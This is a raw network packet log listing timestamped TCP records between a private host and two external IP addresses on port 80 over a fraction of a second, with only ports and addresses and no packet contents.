Dec 12, 2024 16:48:46.002636909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.002840996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.002897978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.003729105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.003926992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.004028082 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.004694939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.004772902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.005770922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.005781889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.005872011 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.006710052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.007119894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.007265091 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.007776976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.007790089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.007839918 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.008296013 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.008358002 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.008534908 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.008591890 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.008727074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.008922100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.009900093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.009968042 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.010036945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.010749102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.010917902 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.011823893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.011838913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.011848927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.011900902 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.012793064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.013978958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.013999939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.014082909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.014187098 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.014842987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.015113115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.015155077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.015841007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.015907049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.015949965 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.016679049 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.016849041 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.016860962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.016870022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.016916037 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.016918898 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.017863035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.018136978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.018923044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.018937111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.018968105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.018990993 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.020162106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.020235062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.020278931 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.021071911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.021087885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.021218061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.022129059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.022141933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.022253036 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.023035049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.024014950 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.024035931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.024041891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.024096012 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.024441004 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.024517059 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.024580956 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.025033951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.025487900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.026084900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.026124001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.026230097 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.027048111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.027057886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.027157068 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.028006077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.028090000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.028244972 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.029011011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.029959917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.030061960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.030069113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.030090094 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.030117035 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.031102896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.031296015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.031667948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.032025099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.032885075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.033062935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.033127069 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.033307076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.034096956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.034188986 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.034774065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.034903049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.035083055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.035922050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.036205053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.036262989 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.037163973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.037184000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.037215948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.037220955 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.037298918 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.038137913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.038237095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.038410902 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.039098978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.087841034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.137590885 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.137644053 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.137790918 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.141351938 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.141418934 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.141722918 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.149228096 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.149296045 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.149635077 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.156395912 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.156582117 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.156688929 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.164160967 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.164190054 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.164629936 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.169606924 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.170506954 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.171458006 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.174031973 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.175697088 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.175954103 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.176239967 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.178293943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.178421021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.178858995 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.178910017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.178994894 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.179018021 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.179024935 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.179028034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.179335117 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.179946899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.180058002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.180247068 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.180813074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.181904078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.181910992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.181945086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.182041883 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.182867050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.183039904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.183677912 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.183785915 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.183794022 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.183832884 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.183906078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.184130907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.184176922 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.184876919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.185597897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.185899973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.186110020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.186177969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.186197042 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.186927080 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.187024117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.187154055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.187948942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.188577890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.188585997 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.188591957 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.188694954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.188709021 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.188986063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.189285994 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.189996004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.190803051 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.190992117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.191045046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.191050053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.191189051 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.192013979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.192157984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.193044901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.193223953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.193350077 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.193372011 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.193420887 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.193425894 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.193463087 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.194032907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.195082903 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.195198059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.195209026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.195255041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.196104050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.196201086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.196619987 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.197221041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.197304010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.198280096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.198355913 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.198394060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.198513985 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.198519945 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.198570013 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.198575974 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.199172974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.200001001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.200074911 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.200196028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.200202942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.200262070 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.201212883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.201221943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.201322079 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.202136993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.203069925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.203078985 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.203109026 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.203188896 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.203206062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.203214884 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.203214884 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.203228951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.203272104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.204221010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.204547882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.204772949 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.205193996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.205251932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.205430984 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.206270933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.207247972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.207256079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.207262993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.207334042 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.207976103 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.208081961 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.208264112 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.208301067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.208389044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.208410025 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.208437920 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.209249973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.209364891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.209414959 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.210335016 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.210345030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.210477114 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.211426973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.211436033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.211487055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.212343931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.212538004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.212635040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.212733030 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.212905884 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.213397980 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.213406086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.213496923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.213557005 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.213594913 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.214622021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.215120077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.215348005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.215929985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.216278076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.216324091 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.216825962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.216851950 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.216888905 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.217621088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.217737913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.217791080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.217865944 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.217873096 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.217997074 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.218570948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.219074965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.219264030 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.219449043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.220058918 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.220138073 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.220448017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.220453978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.220621109 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.221530914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.221908092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.221995115 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.222549915 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.222605944 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.222614050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.222655058 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.222696066 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.222748995 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.222831011 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.223450899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.223915100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.223988056 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.224514008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.224519968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.224602938 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.225596905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.225603104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.225684881 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.226524115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.226856947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.226927042 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.227394104 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.227399111 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.227528095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.227529049 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.227665901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.227739096 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.228569031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.228838921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.228919983 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.229545116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.230056047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.230149984 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.230552912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.231345892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.231404066 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.231555939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.232125998 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.232270002 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.232287884 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.232316971 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.237062931 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.237185955 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.238957882 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.239342928 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.241869926 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.241988897 CET	49957	80	192.168.2.10	185.215.113.16
